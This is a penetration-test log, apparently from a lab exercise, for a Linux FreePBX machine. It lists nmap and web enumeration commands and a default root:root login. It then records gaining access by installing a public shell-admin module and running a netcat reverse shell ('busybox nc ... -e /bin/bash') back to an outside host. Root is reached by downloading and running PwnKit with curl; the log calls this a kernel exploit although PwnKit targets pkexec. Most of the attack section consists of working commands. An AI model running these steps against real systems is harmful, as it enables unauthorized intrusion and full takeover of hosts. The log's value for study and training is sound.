🧪 Pentest Log: {{date:2025-08-25}}

🔍 Target Information

• Machine Name: PBX
• IP Address: 10.11.1.17
• Operating System: Linux

ip=10.11.1.17

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

Found weak credential

root:root

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 80
• Vulnerability Type: Weak Password

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

https://github.com/DarkCoderSc/freepbx-shell-admin-module

Upload and install the module, then

busybox nc 172.16.1.1 80 -e /bin/bash

🧬 Privilege Escalation

👤 Current Access

• User: asterisk
• Groups: 1001(asterisk)
• Shell Type: reverse shell

🔍 Enumeration

Kernel Check:

uname -a

found

Linux pbx 3.16.0-30-generic #40~14.04.1-Ubuntu

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Kernel Exploit
• Target Binary/Service: N/A
• Reference / Source: https://github.com/ly4k/PwnKit

🔧 Exploit Steps

• Setup

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit

• Smash to root

./PwnKit